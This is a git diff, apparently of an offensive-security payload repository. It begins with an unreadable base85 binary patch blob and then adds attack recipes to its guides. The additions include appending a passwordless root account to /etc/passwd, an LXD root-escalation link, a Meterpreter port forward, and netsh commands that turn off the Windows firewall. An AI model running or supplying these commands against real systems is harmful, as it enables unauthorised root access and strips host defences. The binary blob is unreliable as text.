z>qES;P83VOV>m;Nx!pJ0luUA$Pa)&iW6}L8io;CGs918?@yvlfZAsM5{+QfW9OvcI z_UKoj#^%uo>!gf}CHL{>J<;*3BVAZZ(`ftsUWn)zT^hkx>d;#w$2=~O_`DWE2yyZ_ zC02&Vgx0X#io>4yFbV_KHoxiYEKgV!gU^QS=r9R?{+dG$IMF$JeZTb-7uTr#p~SMzPbaO zMPX8L-=rX6aL~f%B?jvi~%3Ky|i1wvXmt>;j;ZT3R3aoPxJ!;Z zzm>}Dwb;(^khfy$faW4$Io-hj{6TX5GO6FP@%j*Ntdqs!v5s`%y0M&^iEm*ka*+Dd zqrT=YNju}o`LD@%Z`ekqdo`A_H1b}WhT@9-DN8i(iH?`Q>KvMWzLTn=SHS@L^la?s z182qASY2qA>/etc/passwd +su - dummy +``` + ## NFS Root Squashing @@ -526,6 +534,8 @@ lxc start mycontainer lxc exec mycontainer /bin/sh ``` +Alternatively https://github.com/initstring/lxd_root + ## References - [SUID vs Capabilities - Dec 7, 2017 - Nick Void aka mn3m](https://mn3m.info/posts/suid-vs-capabilities/) diff --git a/Methodology and Resources/Network Pivoting Techniques.md b/Methodology and Resources/Network Pivoting Techniques.md index 227d80a..a9d182f 100644 --- a/Methodology and Resources/Network Pivoting Techniques.md +++ b/Methodology and Resources/Network Pivoting Techniques.md @@ -85,6 +85,7 @@ optional arguments: ```c portfwd list +portfwd add -l 88 -p 88 -r 127.0.0.1 portfwd add -L 0.0.0.0 -l 445 -r 192.168.57.102 -p 445 or diff --git a/Methodology and Resources/Windows - Privilege Escalation.md b/Methodology and Resources/Windows - Privilege Escalation.md index 3975ad9..45e88b8 100644 --- a/Methodology and Resources/Windows - Privilege Escalation.md +++ b/Methodology and Resources/Windows - Privilege Escalation.md @@ -172,6 +172,13 @@ List firewall's blocked ports $f=New-object -comObject HNetCfg.FwPolicy2;$f.rules | where {$_.action -eq "0"} | select name,applicationname,localports ``` +Disable firewall + +```powershell +netsh firewall set opmode disable +netsh advfirewall set allprofiles state off +``` + List all network shares ```powershell diff --git a/SAML Injection/README.md b/SAML Injection/README.md index 928b56e..e244bfd 100644 --- a/SAML Injection/README.md +++ b/SAML Injection/README.md @@ -161,7 +161,7 @@ The SAML response is accepted by the service provider. Due to the vulnerability, An XSLT can be carried out by using the `transform` element. -![http://sso-attacks.org/images/4/49/XSLT1.jpg](http://sso-attacks.org/images/4/49/XSLT1.jpg) +![http://sso-attacks.org/images/4/49/XSLT1.jpg](http://sso-attacks.org/images/4/49/XSLT1.jpg) Picture from [http://sso-attacks.org/XSLT_Attack](http://sso-attacks.org/XSLT_Attack) ```xml